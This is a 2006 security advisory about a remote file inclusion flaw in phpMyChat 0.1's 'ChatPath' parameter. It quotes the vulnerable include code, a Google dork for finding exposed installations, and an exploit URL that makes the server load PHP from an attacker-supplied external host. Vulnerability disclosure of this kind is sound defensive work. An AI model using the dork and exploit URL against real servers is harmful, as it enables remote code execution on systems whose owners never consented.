SolpotCrew Advisory #13 - phpMyChat 0.1 (ChatPath) Remote File Inclusion

2006-09-27T00:00:00
ID SECURITYVULNS:DOC:14441
Type securityvulns
Reporter Securityvulns
Modified 2006-09-27T00:00:00

Description

#######################SolpotCrew Community

phpMyChat 0.1 (ChatPath) Remote File Inclusion

vendor : http://www.phpheaven.net/phpmychat:home

Bug Found By :Solpot a.k.a (k. Hasibuan) (26-09-2006)

contact: chris_hasibuan@yahoo.com

Website : http://www.nyubicrew.org/adv/solpot-adv-09.txt

Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid

robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa

home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo

Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX

x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t

[K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta

and all member solpotcrew community @ http://nyubicrew.org/forum/

especially thx to str0ke @ milw0rm.com

Input passed to the "ChatPath" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from lib/connected_users.lib.php3

<?php require("${ChatPath}config/config.lib.php3"); require("${ChatPath}lib/database/".C_DB_TYPE.".lib.php3"); require("${ChatPath}lib/clean.lib.php3");

function display_connected($Private,$Full,$String1,$String2)

Google Dork : inurl:register.php3?L=

Exploit : http://somehost/path_to_phpMyChat/lib/connected_users.lib.php3?ChatPath=http://injek-pala-lappet?

########################MY LOVE JUST FOR U RIE#########################
################################E.O.F##################################